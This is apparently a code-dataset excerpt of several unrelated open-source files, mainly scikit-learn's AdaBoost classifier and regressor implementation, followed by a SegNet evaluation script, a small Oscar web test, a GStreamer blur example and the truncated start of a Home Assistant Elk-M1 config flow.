X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. COO, DOK, and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
error : float
The classification error for the current boost.
If None then boosting has terminated early.
"""
pass
def staged_score(self, X, y, sample_weight=None):
"""Return staged scores for X, y.
This generator method yields the ensemble score after each iteration of
boosting and therefore allows monitoring, such as to determine the
score on a test set after each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like, shape = [n_samples]
Labels for X.
sample_weight : array-like, shape = [n_samples], optional
Sample weights.
Returns
-------
        z : generator of float
"""
for y_pred in self.staged_predict(X):
if isinstance(self, ClassifierMixin):
yield accuracy_score(y, y_pred, sample_weight=sample_weight)
else:
yield r2_score(y, y_pred, sample_weight=sample_weight)
@property
def feature_importances_(self):
"""Return the feature importances (the higher, the more important the
feature).
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise ValueError("Estimator not fitted, "
"call `fit` before `feature_importances_`.")
try:
norm = self.estimator_weights_.sum()
return (sum(weight * clf.feature_importances_ for weight, clf
in zip(self.estimator_weights_, self.estimators_))
/ norm)
except AttributeError:
raise AttributeError(
"Unable to compute feature importances "
"since base_estimator does not have a "
"feature_importances_ attribute")
def _validate_X_predict(self, X):
"""Ensure that X is in the proper format"""
if (self.base_estimator is None or
isinstance(self.base_estimator,
(BaseDecisionTree, BaseForest))):
X = check_array(X, accept_sparse='csr', dtype=DTYPE)
else:
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return X
def _samme_proba(estimator, n_classes, X):
"""Calculate algorithm 4, step 2, equation c) of Zhu et al [1].
References
----------
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
proba = estimator.predict_proba(X)
# Displace zero probabilities so the log is defined.
# Also fix negative elements which may occur with
# negative sample weights.
proba[proba < np.finfo(proba.dtype).eps] = np.finfo(proba.dtype).eps
log_proba = np.log(proba)
return (n_classes - 1) * (log_proba - (1. / n_classes)
* log_proba.sum(axis=1)[:, np.newaxis])
class AdaBoostClassifier(BaseWeightBoosting, ClassifierMixin):
"""An AdaBoost classifier.
An AdaBoost [1] classifier is a meta-estimator that begins by fitting a
classifier on the original dataset and then fits additional copies of the
classifier on the same dataset but where the weights of incorrectly
classified instances are adjusted such that subsequent classifiers focus
more on difficult cases.
This class implements the algorithm known as AdaBoost-SAMME [2].
Read more in the :ref:`User Guide <adaboost>`.
Parameters
----------
base_estimator : object, optional (default=DecisionTreeClassifier)
The base estimator from which the boosted ensemble is built.
Support for sample weighting is required, as well as proper `classes_`
and `n_classes_` attributes.
n_estimators : integer, optional (default=50)
The maximum number of estimators at which boosting is terminated.
In case of perfect fit, the learning procedure is stopped early.
learning_rate : float, optional (default=1.)
Learning rate shrinks the contribution of each classifier by
``learning_rate``. There is a trade-off between ``learning_rate`` and
``n_estimators``.
algorithm : {'SAMME', 'SAMME.R'}, optional (default='SAMME.R')
If 'SAMME.R' then use the SAMME.R real boosting algorithm.
``base_estimator`` must support calculation of class probabilities.
If 'SAMME' then use the SAMME discrete boosting algorithm.
The SAMME.R algorithm typically converges faster than SAMME,
achieving a lower test error with fewer boosting iterations.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators.
classes_ : array of shape = [n_classes]
The classes labels.
n_classes_ : int
The number of classes.
estimator_weights_ : array of floats
Weights for each estimator in the boosted ensemble.
estimator_errors_ : array of floats
Classification error for each estimator in the boosted
ensemble.
feature_importances_ : array of shape = [n_features]
The feature importances if supported by the ``base_estimator``.
See also
--------
AdaBoostRegressor, GradientBoostingClassifier, DecisionTreeClassifier
References
----------
.. [1] Y. Freund, R. Schapire, "A Decision-Theoretic Generalization of
on-Line Learning and an Application to Boosting", 1995.
.. [2] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
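    Examples
    --------
    A minimal usage sketch (``X_train``, ``y_train`` and ``X_test`` are
    assumed to be provided by the caller)::

        from sklearn.ensemble import AdaBoostClassifier

        clf = AdaBoostClassifier(n_estimators=100)
        clf.fit(X_train, y_train)
        predictions = clf.predict(X_test)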
"""
def __init__(self,
base_estimator=None,
n_estimators=50,
learning_rate=1.,
algorithm='SAMME.R',
random_state=None):
super(AdaBoostClassifier, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
learning_rate=learning_rate,
random_state=random_state)
self.algorithm = algorithm
def fit(self, X, y, sample_weight=None):
"""Build a boosted classifier from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
``1 / n_samples``.
Returns
-------
self : object
Returns self.
"""
# Check that algorithm is supported
if self.algorithm not in ('SAMME', 'SAMME.R'):
raise ValueError("algorithm %s is not supported" % self.algorithm)
# Fit
return super(AdaBoostClassifier, self).fit(X, y, sample_weight)
def _validate_estimator(self):
"""Check the estimator and set the base_estimator_ attribute."""
super(AdaBoostClassifier, self)._validate_estimator(
default=DecisionTreeClassifier(max_depth=1))
# SAMME-R requires predict_proba-enabled base estimators
if self.algorithm == 'SAMME.R':
if not hasattr(self.base_estimator_, 'predict_proba'):
raise TypeError(
"AdaBoostClassifier with algorithm='SAMME.R' requires "
"that the weak learner supports the calculation of class "
"probabilities with a predict_proba method.\n"
"Please change the base estimator or set "
"algorithm='SAMME' instead.")
if not has_fit_parameter(self.base_estimator_, "sample_weight"):
raise ValueError("%s doesn't support sample_weight."
% self.base_estimator_.__class__.__name__)
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost.
Perform a single boost according to the real multi-class SAMME.R
algorithm or to the discrete SAMME algorithm and return the updated
sample weights.
Parameters
----------
iboost : int
The index of the current boost iteration.
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
estimator_error : float
The classification error for the current boost.
If None then boosting has terminated early.
"""
if self.algorithm == 'SAMME.R':
return self._boost_real(iboost, X, y, sample_weight)
else: # elif self.algorithm == "SAMME":
return self._boost_discrete(iboost, X, y, sample_weight)
def _boost_real(self, iboost, X, y, sample_weight):
"""Implement a single boost using the SAMME.R real algorithm."""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
estimator.fit(X, y, sample_weight=sample_weight)
y_predict_proba = estimator.predict_proba(X)
if iboost == 0:
self.classes_ = getattr(estimator, 'classes_', None)
self.n_classes_ = len(self.classes_)
y_predict = self.classes_.take(np.argmax(y_predict_proba, axis=1),
axis=0)
# Instances incorrectly classified
incorrect = y_predict != y
# Error fraction
estimator_error = np.mean(
np.average(incorrect, weights=sample_weight, axis=0))
# Stop if classification is perfect
if estimator_error <= 0:
return sample_weight, 1., 0.
# Construct y coding as described in Zhu et al [2]:
#
# y_k = 1 if c == k else -1 / (K - 1)
#
# where K == n_classes_ and c, k in [0, K) are indices along the second
# axis of the y coding with c being the index corresponding to the true
# class label.
n_classes = self.n_classes_
classes = self.classes_
y_codes = np.array([-1. / (n_classes - 1), 1.])
y_coding = y_codes.take(classes == y[:, np.newaxis])
# Displace zero probabilities so the log is defined.
# Also fix negative elements which may occur with
# negative sample weights.
proba = y_predict_proba # alias for readability
proba[proba < np.finfo(proba.dtype).eps] = np.finfo(proba.dtype).eps
# Boost weight using multi-class AdaBoost SAMME.R alg
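        # Per-sample update from Zhu et al.:
        #   w_i <- -lr * ((K - 1) / K) * <y_coding_i, log p(x_i)>.
        # Note SAMME.R uses a constant estimator weight of 1 (returned below).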
estimator_weight = (-1. * self.learning_rate
* (((n_classes - 1.) / n_classes) *
inner1d(y_coding, np.log(y_predict_proba))))
# Only boost the weights if it will fit again
if not iboost == self.n_estimators - 1:
# Only boost positive weights
sample_weight *= np.exp(estimator_weight *
((sample_weight > 0) |
(estimator_weight < 0)))
return sample_weight, 1., estimator_error
def _boost_discrete(self, iboost, X, y, sample_weight):
"""Implement a single boost using the SAMME discrete algorithm."""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
estimator.fit(X, y, sample_weight=sample_weight)
y_predict = estimator.predict(X)
if iboost == 0:
self.classes_ = getattr(estimator, 'classes_', None)
self.n_classes_ = len(self.classes_)
# Instances incorrectly classified
incorrect = y_predict != y
# Error fraction
estimator_error = np.mean(
np.average(incorrect, weights=sample_weight, axis=0))
# Stop if classification is perfect
if estimator_error <= 0:
return sample_weight, 1., 0.
n_classes = self.n_classes_
# Stop if the error is at least as bad as random guessing
if estimator_error >= 1. - (1. / n_classes):
self.estimators_.pop(-1)
if len(self.estimators_) == 0:
raise ValueError('BaseClassifier in AdaBoostClassifier '
'ensemble is worse than random, ensemble '
'can not be fit.')
return None, None, None
# Boost weight using multi-class AdaBoost SAMME alg
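        # alpha = lr * (log((1 - err) / err) + log(K - 1)); for K == 2 the
        # log(K - 1) term vanishes and this reduces to classic AdaBoost.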
estimator_weight = self.learning_rate * (
np.log((1. - estimator_error) / estimator_error) +
np.log(n_classes - 1.))
        # Only boost the weights if it will fit again
if not iboost == self.n_estimators - 1:
# Only boost positive weights
sample_weight *= np.exp(estimator_weight * incorrect *
((sample_weight > 0) |
(estimator_weight < 0)))
return sample_weight, estimator_weight, estimator_error
def predict(self, X):
"""Predict classes for X.
The predicted class of an input sample is computed as the weighted mean
prediction of the classifiers in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : array of shape = [n_samples]
The predicted classes.
"""
pred = self.decision_function(X)
if self.n_classes_ == 2:
return self.classes_.take(pred > 0, axis=0)
return self.classes_.take(np.argmax(pred, axis=1), axis=0)
def staged_predict(self, X):
"""Return staged predictions for X.
The predicted class of an input sample is computed as the weighted mean
prediction of the classifiers in the ensemble.
This generator method yields the ensemble prediction after each
iteration of boosting and therefore allows monitoring, such as to
determine the prediction on a test set after each boost.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array, shape = [n_samples]
The predicted classes.
"""
n_classes = self.n_classes_
classes = self.classes_
if n_classes == 2:
for pred in self.staged_decision_function(X):
yield np.array(classes.take(pred > 0, axis=0))
else:
for pred in self.staged_decision_function(X):
yield np.array(classes.take(
np.argmax(pred, axis=1), axis=0))
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
score : array, shape = [n_samples, k]
The decision function of the input samples. The order of
            outputs is the same as that of the `classes_` attribute.
            Binary classification is a special case with ``k == 1``,
otherwise ``k==n_classes``. For binary classification,
values closer to -1 or 1 mean more like the first or second
class in ``classes_``, respectively.
"""
check_is_fitted(self, "n_classes_")
X = self._validate_X_predict(X)
n_classes = self.n_classes_
classes = self.classes_[:, np.newaxis]
pred = None
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
pred = sum(_samme_proba(estimator, n_classes, X)
for estimator in self.estimators_)
else: # self.algorithm == "SAMME"
pred = sum((estimator.predict(X) == classes).T * w
for estimator, w in zip(self.estimators_,
self.estimator_weights_))
pred /= self.estimator_weights_.sum()
if n_classes == 2:
pred[:, 0] *= -1
return pred.sum(axis=1)
return pred
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each boosting iteration.
This method allows monitoring (i.e. determine error on testing set)
after each boosting iteration.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of
            outputs is the same as that of the `classes_` attribute.
            Binary classification is a special case with ``k == 1``,
otherwise ``k==n_classes``. For binary classification,
values closer to -1 or 1 mean more like the first or second
class in ``classes_``, respectively.
"""
check_is_fitted(self, "n_classes_")
X = self._validate_X_predict(X)
n_classes = self.n_classes_
classes = self.classes_[:, np.newaxis]
pred = None
norm = 0.
for weight, estimator in zip(self.estimator_weights_,
self.estimators_):
norm += weight
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
current_pred = _samme_proba(estimator, n_classes, X)
else: # elif self.algorithm == "SAMME":
current_pred = estimator.predict(X)
current_pred = (current_pred == classes).T * weight
if pred is None:
pred = current_pred
else:
pred += current_pred
if n_classes == 2:
tmp_pred = np.copy(pred)
tmp_pred[:, 0] *= -1
yield (tmp_pred / norm).sum(axis=1)
else:
yield pred / norm
def predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample is computed as
the weighted mean predicted class probabilities of the classifiers
in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
        p : array of shape = [n_samples, n_classes]
            The class probabilities of the input samples. The order of
            outputs is the same as that of the `classes_` attribute.
"""
check_is_fitted(self, "n_classes_")
n_classes = self.n_classes_
X = self._validate_X_predict(X)
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
proba = sum(_samme_proba(estimator, n_classes, X)
for estimator in self.estimators_)
else: # self.algorithm == "SAMME"
proba = sum(estimator.predict_proba(X) * w
for estimator, w in zip(self.estimators_,
self.estimator_weights_))
proba /= self.estimator_weights_.sum()
proba = np.exp((1. / (n_classes - 1)) * proba)
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
def staged_predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample is computed as
the weighted mean predicted class probabilities of the classifiers
in the ensemble.
This generator method yields the ensemble predicted class probabilities
after each iteration of boosting and therefore allows monitoring, such
as to determine the predicted class probabilities on a test set after
each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
        p : generator of array, shape = [n_samples, n_classes]
            The class probabilities of the input samples. The order of
            outputs is the same as that of the `classes_` attribute.
"""
X = self._validate_X_predict(X)
n_classes = self.n_classes_
proba = None
norm = 0.
for weight, estimator in zip(self.estimator_weights_,
self.estimators_):
norm += weight
if self.algorithm == 'SAMME.R':
# The weights are all 1. for SAMME.R
current_proba = _samme_proba(estimator, n_classes, X)
else: # elif self.algorithm == "SAMME":
current_proba = estimator.predict_proba(X) * weight
if proba is None:
proba = current_proba
else:
proba += current_proba
real_proba = np.exp((1. / (n_classes - 1)) * (proba / norm))
normalizer = real_proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
real_proba /= normalizer
yield real_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities for X.
The predicted class log-probabilities of an input sample is computed as
the weighted mean predicted class log-probabilities of the classifiers
in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
        p : array of shape = [n_samples, n_classes]
            The class log-probabilities of the input samples. The order of
            outputs is the same as that of the `classes_` attribute.
"""
return np.log(self.predict_proba(X))
class AdaBoostRegressor(BaseWeightBoosting, RegressorMixin):
"""An AdaBoost regressor.
An AdaBoost [1] regressor is a meta-estimator that begins by fitting a
regressor on the original dataset and then fits additional copies of the
regressor on the same dataset but where the weights of instances are
adjusted according to the error of the current prediction. As such,
subsequent regressors focus more on difficult cases.
This class implements the algorithm known as AdaBoost.R2 [2].
Read more in the :ref:`User Guide <adaboost>`.
Parameters
----------
base_estimator : object, optional (default=DecisionTreeRegressor)
The base estimator from which the boosted ensemble is built.
Support for sample weighting is required.
n_estimators : integer, optional (default=50)
The maximum number of estimators at which boosting is terminated.
In case of perfect fit, the learning procedure is stopped early.
learning_rate : float, optional (default=1.)
Learning rate shrinks the contribution of each regressor by
``learning_rate``. There is a trade-off between ``learning_rate`` and
``n_estimators``.
loss : {'linear', 'square', 'exponential'}, optional (default='linear')
The loss function to use when updating the weights after each
boosting iteration.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators.
estimator_weights_ : array of floats
Weights for each estimator in the boosted ensemble.
estimator_errors_ : array of floats
Regression error for each estimator in the boosted ensemble.
feature_importances_ : array of shape = [n_features]
The feature importances if supported by the ``base_estimator``.
See also
--------
AdaBoostClassifier, GradientBoostingRegressor, DecisionTreeRegressor
References
----------
.. [1] Y. Freund, R. Schapire, "A Decision-Theoretic Generalization of
on-Line Learning and an Application to Boosting", 1995.
.. [2] H. Drucker, "Improving Regressors using Boosting Techniques", 1997.
"""
def __init__(self,
base_estimator=None,
n_estimators=50,
learning_rate=1.,
loss='linear',
random_state=None):
super(AdaBoostRegressor, self).__init__(
base_estimator=base_estimator,
n_estimators=n_estimators,
learning_rate=learning_rate,
random_state=random_state)
self.loss = loss
self.random_state = random_state
def fit(self, X, y, sample_weight=None):
"""Build a boosted regressor from the training set (X, y).
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (real numbers).
sample_weight : array-like of shape = [n_samples], optional
Sample weights. If None, the sample weights are initialized to
1 / n_samples.
Returns
-------
self : object
Returns self.
"""
# Check loss
if self.loss not in ('linear', 'square', 'exponential'):
raise ValueError(
"loss must be 'linear', 'square', or 'exponential'")
# Fit
return super(AdaBoostRegressor, self).fit(X, y, sample_weight)
def _validate_estimator(self):
"""Check the estimator and set the base_estimator_ attribute."""
super(AdaBoostRegressor, self)._validate_estimator(
default=DecisionTreeRegressor(max_depth=3))
def _boost(self, iboost, X, y, sample_weight):
"""Implement a single boost for regression
Perform a single boost according to the AdaBoost.R2 algorithm and
return the updated sample weights.
Parameters
----------
iboost : int
The index of the current boost iteration.
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
y : array-like of shape = [n_samples]
The target values (class labels in classification, real numbers in
regression).
sample_weight : array-like of shape = [n_samples]
The current sample weights.
Returns
-------
sample_weight : array-like of shape = [n_samples] or None
The reweighted sample weights.
If None then boosting has terminated early.
estimator_weight : float
The weight for the current boost.
If None then boosting has terminated early.
estimator_error : float
The regression error for the current boost.
If None then boosting has terminated early.
"""
estimator = self._make_estimator()
try:
estimator.set_params(random_state=self.random_state)
except ValueError:
pass
generator = check_random_state(self.random_state)
# Weighted sampling of the training set with replacement
# For NumPy >= 1.7.0 use np.random.choice
cdf = sample_weight.cumsum()
cdf /= cdf[-1]
uniform_samples = generator.random_sample(X.shape[0])
bootstrap_idx = cdf.searchsorted(uniform_samples, side='right')
# searchsorted returns a scalar
bootstrap_idx = np.array(bootstrap_idx, copy=False)
# Fit on the bootstrapped sample and obtain a prediction
# for all samples in the training set
estimator.fit(X[bootstrap_idx], y[bootstrap_idx])
y_predict = estimator.predict(X)
error_vect = np.abs(y_predict - y)
error_max = error_vect.max()
if error_max != 0.:
error_vect /= error_max
if self.loss == 'square':
error_vect **= 2
elif self.loss == 'exponential':
error_vect = 1. - np.exp(- error_vect)
# Calculate the average loss
estimator_error = (sample_weight * error_vect).sum()
if estimator_error <= 0:
# Stop if fit is perfect
return sample_weight, 1., 0.
elif estimator_error >= 0.5:
# Discard current estimator only if it isn't the only one
if len(self.estimators_) > 1:
self.estimators_.pop(-1)
return None, None, None
beta = estimator_error / (1. - estimator_error)
# Boost weight using AdaBoost.R2 alg
estimator_weight = self.learning_rate * np.log(1. / beta)
if not iboost == self.n_estimators - 1:
sample_weight *= np.power(
beta,
(1. - error_vect) * self.learning_rate)
return sample_weight, estimator_weight, estimator_error
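# Worked example of the AdaBoost.R2 update above (added comments, not part
# of the original source): with learning_rate=1.0 and an average loss of
# estimator_error = 0.2,
#   beta             = 0.2 / (1 - 0.2)     = 0.25
#   estimator_weight = 1.0 * log(1 / 0.25) ~= 1.386
# A sample predicted perfectly (normalized error 0) has its weight
# multiplied by beta ** 1 = 0.25, while a sample at the maximum error keeps
# its weight (beta ** 0 = 1), so relative weight shifts toward hard cases.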
def _get_median_predict(self, X, limit):
# Evaluate predictions of all estimators
predictions = np.array([
est.predict(X) for est in self.estimators_[:limit]]).T
# Sort the predictions
sorted_idx = np.argsort(predictions, axis=1)
# Find index of median prediction for each sample
weight_cdf = self.estimator_weights_[sorted_idx].cumsum(axis=1)
median_or_above = weight_cdf >= 0.5 * weight_cdf[:, -1][:, np.newaxis]
median_idx = median_or_above.argmax(axis=1)
median_estimators = sorted_idx[np.arange(X.shape[0]), median_idx]
# Return median predictions
return predictions[np.arange(X.shape[0]), median_estimators]
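# Worked example of the weighted median above (added comments, not part of
# the original source): for one sample with sorted predictions
# [1.0, 2.0, 3.0] whose estimators carry weights [3, 1, 2], weight_cdf is
# [3, 4, 6] and the threshold is 0.5 * 6 = 3, so argmax picks index 0 and
# the prediction 1.0 from the weight-3 estimator is returned.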
def predict(self, X):
"""Predict regression value for X.
The predicted regression value of an input sample is computed
as the weighted median prediction of the regressors in the ensemble.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : array of shape = [n_samples]
The predicted regression values.
"""
check_is_fitted(self, "estimator_weights_")
X = self._validate_X_predict(X)
return self._get_median_predict(X, len(self.estimators_))
def staged_predict(self, X):
"""Return staged predictions for X.
The predicted regression value of an input sample is computed
as the weighted median prediction of the regressors in the ensemble.
This generator method yields the ensemble prediction after each
iteration of boosting and therefore allows monitoring, such as to
determine the prediction on a test set after each boost.
Parameters
----------
X : {array-like, sparse matrix} of shape = [n_samples, n_features]
The training input samples. Sparse matrix can be CSC, CSR, COO,
DOK, or LIL. DOK and LIL are converted to CSR.
Returns
-------
y : generator of array, shape = [n_samples]
The predicted regression values.
"""
check_is_fitted(self, "estimator_weights_")
X = self._validate_X_predict(X)
for i, _ in enumerate(self.estimators_, 1):
yield self._get_median_predict(X, limit=i)
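# A minimal usage sketch (added for illustration, not part of the original
# module). It assumes a scikit-learn checkout of this vintage where the
# class is importable from sklearn.ensemble; kept commented out so the
# module body is unchanged when imported.
#
# import numpy as np
# from sklearn.ensemble import AdaBoostRegressor
#
# rng = np.random.RandomState(0)
# X = np.linspace(0, 6, 100)[:, np.newaxis]
# y = np.sin(X).ravel() + rng.normal(0, 0.1, X.shape[0])
# model = AdaBoostRegressor(n_estimators=50, learning_rate=1.0,
#                           loss='linear', random_state=0)
# model.fit(X, y)
# y_pred = model.predict(X)          # weighted-median prediction
# for staged in model.staged_predict(X):
#     pass                           # prediction after each boost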
|
mattvick/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/style/checkers/__init__.py
|
6014
|
# Required for Python to search this directory for module files
|
mengli/MachineLearning
|
refs/heads/master
|
self_driving/segnet/evaluate_kitti.py
|
2
|
"""Evaluate SegNet.
nohup python -u -m self_driving.segnet.evaluate_kitti > self_driving/segnet/output.txt 2>&1 &
"""
import os
import tensorflow as tf
from utils import kitti_segnet
from scipy import misc
LOG_DIR = 'backup/segnet_kitti'
EPOCH = 237
BATCH_SIZE = 1
IMAGE_HEIGHT = 375
IMAGE_WIDTH = 1242
NUM_CLASSES = 2
test_dir = "/usr/local/google/home/limeng/Downloads/kitti/data_road/testing/test.txt"
colors = [
[255, 0, 255],
[255, 0, 0],
]
def color_mask(tensor, color):
return tf.reduce_all(tf.equal(tensor, color), 3)
def one_hot(labels):
color_tensors = tf.unstack(colors)
channel_tensors = list(map(lambda color: color_mask(labels, color), color_tensors))
one_hot_labels = tf.cast(tf.stack(channel_tensors, 3), 'float32')
return one_hot_labels
def rgb(logits):
softmax = tf.nn.softmax(logits)
argmax = tf.argmax(softmax, 3)
color_map = tf.constant(colors, dtype=tf.float32)
n = color_map.get_shape().as_list()[0]
one_hot = tf.one_hot(argmax, n, dtype=tf.float32)
one_hot_matrix = tf.reshape(one_hot, [-1, n])
rgb_matrix = tf.matmul(one_hot_matrix, color_map)
rgb_tensor = tf.reshape(rgb_matrix, [-1, IMAGE_HEIGHT, IMAGE_WIDTH, 3])
return tf.cast(rgb_tensor, tf.float32)
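# Worked example of rgb() above (added comments, not part of the original
# script): argmax over the class axis yields one index per pixel, and the
# one-hot/matmul pair maps index 0 to colors[0] = [255, 0, 255] (magenta)
# and index 1 to colors[1] = [255, 0, 0] (red), producing an RGB image of
# shape [batch, IMAGE_HEIGHT, IMAGE_WIDTH, 3].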
def main(_):
test_image_filenames, test_label_filenames = kitti_segnet.get_filename_list(test_dir)
index = 0
with tf.Graph().as_default():
with tf.device('/cpu:0'):
config = tf.ConfigProto()
config.gpu_options.allocator_type = 'BFC'
sess = tf.InteractiveSession(config=config)
images, labels = kitti_segnet.CamVidInputs(test_image_filenames,
test_label_filenames,
BATCH_SIZE,
shuffle=False)
saver = tf.train.import_meta_graph(os.path.join(LOG_DIR, "segnet.ckpt.meta"))
saver.restore(sess, tf.train.latest_checkpoint(LOG_DIR))
graph = tf.get_default_graph()
train_data = graph.get_tensor_by_name("train_data:0")
train_label = graph.get_tensor_by_name("train_labels:0")
is_training = graph.get_tensor_by_name("is_training:0")
logits = tf.get_collection("logits")[0]
# Start the queue runners.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
for i in range(EPOCH):
image_batch, label_batch = sess.run([images, labels])
feed_dict = {
train_data: image_batch,
train_label: label_batch,
is_training: True
}
prediction = rgb(logits)
pred = sess.run([prediction], feed_dict)[0]
for batch in range(BATCH_SIZE):
misc.imsave('output/segnet_kitti/decision_%d.png' % index, pred[batch])
misc.imsave('output/segnet_kitti/train_%d.png' % index, image_batch[batch])
index += 1
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
tf.app.run(main=main)
|
anandsimmy/ecommerce
|
refs/heads/master
|
tests/functional/test_offer.py
|
70
|
from oscar.test.testcases import WebTestCase
class TestTheOfferListPage(WebTestCase):
def test_exists(self):
response = self.app.get('/offers/')
self.assertEqual(200, response.status_code)
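# A hedged companion sketch (not in the original file; the detail URL and
# the 404 behaviour are assumptions about this project, not verified):
#
# def test_unknown_offer_returns_404(self):
#     response = self.app.get('/offers/does-not-exist/', expect_errors=True)
#     self.assertEqual(404, response.status_code)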
|
matt-hammond-bbc/gst-plugins-bad-mpegtsdemux-mods
|
refs/heads/1.4.3-mods
|
gst/gaudieffects/blur-example.py
|
73
|
#!/usr/bin/python
import gobject; gobject.threads_init()
import pygst; pygst.require("0.10")
import gst
p = gst.parse_launch ("""
v4l2src !
videoconvert ! queue ! video/x-raw,width=320,height=240,framerate=30/1 ! gaussianblur qos=true name=vf ! videoconvert ! timeoverlay ! xvimagesink
""")
m = p.get_by_name ("vf")
m.set_property ("sigma", 0.5)
control = gst.Controller(m, "sigma")
control.set_interpolation_mode("sigma", gst.INTERPOLATE_LINEAR)
control.set("sigma", 0 * gst.SECOND, 0.5)
control.set("sigma", 5 * gst.SECOND, 10.0)
control.set("sigma", 25 * gst.SECOND, -5.0)
p.set_state (gst.STATE_PLAYING)
gobject.MainLoop().run()
|
adrienbrault/home-assistant
|
refs/heads/dev
|
homeassistant/components/elkm1/config_flow.py
|
3
|
"""Config flow for Elk-M1 Control integration."""
import asyncio
import logging
from urllib.parse import urlparse
import elkm1_lib as elkm1
import voluptuous as vol
from homeassistant import config_entries, exceptions
from homeassistant.const import (
CONF_ADDRESS,
CONF_HOST,
CONF_PASSWORD,
CONF_PREFIX,
CONF_PROTOCOL,
CONF_TEMPERATURE_UNIT,
CONF_USERNAME,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.util import slugify
from . import async_wait_for_elk_to_sync
from .const import CONF_AUTO_CONFIGURE, DOMAIN
_LOGGER = logging.getLogger(__name__)
PROTOCOL_MAP = {"secure": "elks://", "non-secure": "elk://", "serial": "serial://"}
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_PROTOCOL, default="secure"): vol.In(
["secure", "non-secure", "serial"]
),
vol.Required(CONF_ADDRESS): str,
